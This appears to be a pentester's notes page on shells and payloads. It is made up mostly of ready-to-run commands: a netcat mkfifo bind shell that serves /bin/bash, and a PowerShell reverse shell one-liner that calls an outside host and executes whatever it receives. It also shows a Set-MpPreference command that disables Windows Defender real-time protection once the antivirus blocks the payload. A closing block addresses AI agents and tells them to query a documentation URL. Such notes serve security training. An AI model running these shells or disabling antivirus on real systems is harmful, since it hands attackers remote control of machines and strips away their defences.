# Shells & Payloads

## Bind Shells

<figure><img src="/files/znywcrFsS235tRBKpzub" alt=""><figcaption><p>With a bind shell, the <code>target</code> system has a listener started and awaits a connection from a pentester's system (attack box).</p></figcaption></figure>

## Basic Bind Shell with Netcat

### **Server - Binding a Bash shell to the TCP session**

{% code overflow="wrap" %}

```
rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc -l 10.129.41.200 7777 > /tmp/f
```

{% endcode %}

<figure><img src="/files/tJ6gbTD539e4NtkPkhqL" alt=""><figcaption></figcaption></figure>

### **Client - Connecting to bind shell on target**

{% code overflow="wrap" %}

```
nc -nv 10.129.41.200 7777
```

{% endcode %}

<figure><img src="/files/jxfjWZeBhksiVSPPG1GV" alt=""><figcaption></figcaption></figure>

## Reverse Shells

<figure><img src="/files/YaJ4JOAq3z1FmpXBOWBd" alt=""><figcaption><p>With a reverse shell, the attack box will have a listener running, and the target will need to initiate the connection.</p></figcaption></figure>

## Simple Reverse Shell in Windows

### Server (attack box)

{% code overflow="wrap" %}

```
sudo nc -lvnp 443
```

{% endcode %}

<figure><img src="/files/pJ2DhUPfy3zDlgOMdrdO" alt=""><figcaption></figcaption></figure>

### **Client (target)**

{% code overflow="wrap" %}

```
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.158',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
```

{% endcode %}

<figure><img src="/files/WoD9yp6IaEa8gZSrGr9E" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/5ty2tpXZIZkt8fZnOJzN" alt=""><figcaption><p> <code>Windows Defender antivirus</code> (<code>AV</code>) software stopped the execution of the code. </p></figcaption></figure>

### **Disable AV**

{% code overflow="wrap" %}

```
Set-MpPreference -DisableRealtimeMonitoring $true
```

{% endcode %}

<figure><img src="/files/p8qgOwI01qMu03r2LWtc" alt=""><figcaption><p>To disable the antivirus through the <code>Virus &#x26; threat protection settings</code> or by using this command in an administrative PowerShell console. Once AV is disabled, attempt to execute the code again.</p></figcaption></figure>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://thescriptkid.gitbook.io/notes/miscellaneous/shells-and-payloads.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.